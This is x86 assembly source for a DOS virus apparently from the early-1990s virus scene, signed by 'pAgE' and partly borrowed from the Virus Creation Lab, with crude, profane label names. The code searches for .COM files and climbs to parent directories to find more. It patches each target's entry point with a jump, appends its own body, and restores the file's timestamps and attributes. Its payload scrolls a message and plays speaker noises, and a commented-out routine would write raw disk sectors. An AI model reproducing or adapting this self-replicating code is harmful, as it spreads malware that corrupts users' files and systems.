; ; ÖÄÄ¿ ÖÄÄ¿ ÖÄÄ¿ ÄÒÄ ÒÄÄ¿ ÖÄÄ¿ ÖÄÒÄ¿ ; ÇÄÄ´ º ³ º º ÇÄ º ³ º ; Ð Á Ð Á ÓÄÄÙ ÄÐÄ ÐÄÄÙ Ð Á Ð ; ÖÄ¿ ÖÄÄ¿ ÖÄÄ¿ ÒÄÄ¿ ; ÓÄ¿ ÇÄÄ´ º Ä¿ ÇÄ ; ÓÄÄÙ Ð Á ÓÄÄÙ ÐÄÄÙ ; ; ...from the books of pAgE ; .model tiny .code org 100h depth_of_well equ longer_than-my_dick my_dick: call yump_up_and_go yump_up_and_go: pop bp sub bp,offset yump_up_and_go jmp hop_over_da_shit and_over_it_again: mov ax,3524h int 21h mov word ptr [bp+stash_box],bx mov word ptr [bp+stash_box+2],es mov ah,25h lea dx,[bp+offset int24] int 21h push cs pop es jmp gordon_effect hop_over_da_shit: lea si,[bp+stash_3] mov di,100h push di movsw movsb mov byte ptr [bp+how_many],4 stupid_shit_trns: mov ah,1Ah lea dx,[bp+new_chunk] int 21h mov ah,47h mov dl,0 lea si,[bp+where_we_is] int 21h mov byte ptr [bp+eyelash],'\' jmp and_over_it_again jmp bang_bang put_fletch_on_it proc far yeeha_go: mov ah,0h mov al,12h int 10h jmp yo_homey_1 stupid_shit_1 db 4 stupid_shit_2 dw 0 db 62h, 79h copyright db '-->>pAgE<<--' db '(C)1992 TuRN-THE-pAgE ' stupid_shit_5 db 'Ancient Sages' db ' ' db ' Is one of pAgEs' db ' ' db '$' yo_homey_1: push si push di mov si,80h cld call mo_stupid_shit_1 cmp byte ptr [si],0Dh je yo_homey_4 mov cx,28h lea di,stupid_shit_5 yo_homeyloop_2: lodsb cmp al,0Dh je yo_homey_3 stosb loop yo_homeyloop_2 yo_homey_3: inc cx mov al,2Eh rep stosb yo_homey_4: pop di pop si mov dx,si mov cx,di mov stupid_shit_2,cx yo_homey_5: mov stupid_shit_1,0FFh yo_homey_6: add stupid_shit_1,1 mov bl,stupid_shit_1 mov cx,40 call mo_stupid_shit_2 yo_homeyloop_7: mov al,byte ptr copyright+20h[bx] mov ah,0eh int 10h inc bx call mo_stupid_shit_3 mov dl,0FFh mov ah,6 int 21h jnz yo_homey_10 loop yo_homeyloop_7 cmp byte ptr copyright+20h[bx],24h je yo_homey_5 jmp short yo_homey_6 put_fletch_on_it endp mo_stupid_shit_1 proc near yo_homey_8: inc si cmp byte ptr [si],20h je yo_homey_8 retn mo_stupid_shit_1 endp mo_stupid_shit_2 proc near push ax push bx push cx push dx mov dx,si mov cx,di mov ah,0Fh int 010h mov ax,1210h mov bx,55h int 10h pop dx pop cx pop bx pop ax retn mo_stupid_shit_2 endp mo_stupid_shit_3 proc near push cx mov cx,258h yo_homeyloop_9: loop yo_homeyloop_9 pop cx retn mo_stupid_shit_3 endp yo_homey_10: call mo_stupid_shit_2 mov cx,4Fh yo_homeyloop_11: mov al,20h mov ah,0Eh int 10h loop yo_homeyloop_11 mov ah,1 mov cx,stupid_shit_2 int 10h jmp bang_bang call fuck_da_monkey gordon_effect: lea dx,[bp+what_we_wants] mov ah,4eh mov cx,7h findfirstyump_up_and_go: nop int 21h mov al,0h call tear_it_open xchg ax,bx mov ah,3fh lea dx,[bp+muffler] mov cx,1ah int 21h mov ah,3eh int 21h check_it_out: mov ax,word ptr [bp+new_chunk+1Ah] cmp ax,(longer_than-my_dick) jb find_next cmp ax,65535-(longer_than-my_dick) ja find_next mov bx,word ptr [bp+muffler+1] add bx,longer_than-my_dick+3 cmp ax,bx je find_next jmp yo_over_here find_next: mov ah,4fh jmp short findfirstyump_up_and_go mov ah,3bh lea dx,[bp+dot_dot] int 21h jnc gordon_effect mov bx,word ptr [bp+muffler+1] add bx,longer_than-my_dick+3 yo_over_here: mov cx,3 sub ax,cx lea si,[bp+offset muffler] lea di,[bp+offset stash_3] movsw movsb mov byte ptr [si-3],0e9h mov word ptr [si-2],ax finishgordon_effection: push cx xor cx,cx call attributes mov al,2 call tear_it_open mov ah,40h lea dx,[bp+muffler] pop cx int 21h mov ax,4202h xor cx,cx cwd int 21h mov ah,40h lea dx,[bp+my_dick] mov cx,longer_than-my_dick int 21h mov ax,5701h mov cx,word ptr [bp+new_chunk+16h] mov dx,word ptr [bp+new_chunk+18h] int 21h mov ah,3eh int 21h mov ch,0 mov cl,byte ptr [bp+new_chunk+15h] call attributes leave_heeruh_virus: mov ax,2524h lds dx,[bp+offset stash_box] int 21h push cs pop ds olley: call put_fletch_on_it tear_it_open proc near mov ah,3dh lea dx,[bp+new_chunk+30] int 21h xchg ax,bx ret endp tear_it_open attributes proc near mov ax,4301h lea dx,[bp+new_chunk+30] int 21h ret endp attributes int24: mov al,3 iret yumpem_keep dd ? how_many db ? davey_jones dd ? yumpem_keep2 db ? stash_3 db 0cdh,20h,0 davey_jones2 dd ? what_we_wants db "*.COM",0 muffler db 1ah dup (?) stash_box dd ? eyelash db ? where_we_is db 64 dup (?) new_chunk db 43 dup (?) dot_dot db '..',0 ;<><><><><><><><><><><><><><><><><><><><><><><><><><> ; Borrowed this segment from the VCL ;<><><><><><><><><><><><><><><><><><><><><><><><><><> bang_bang proc near mov cx,0025h new_shot: push cx mov dx,0140h mov bx,0100h in al,061h and al,11111100b fire_shot: xor al,2 out 061h,al add dx,09248h mov cl,3 ror dx,cl mov cx,dx and cx,01FFh or cx,10 shoot_pause: loop shoot_pause dec bx jnz fire_shot and al,11111100b out 061h,al mov bx,0002h xor ah,ah int 1Ah add bx,dx shoot_delay: int 1Ah cmp dx,bx jne shoot_delay pop cx loop new_shot endp bang_bang fuck_da_monkey proc near ;xor ah,ah ;int 1Ah ;xchg dx,ax ;mov dx,0FFh out_loop: ;out dx,al ;dec dx ;jne out_loop ;mov al,0002h ;mov cx,3 ;lea dx,stupid_shit1_file ;int 26h ;cli ;hlt ;jmp short $ endp fuck_da_monkey int 20h longer_than: end my_dick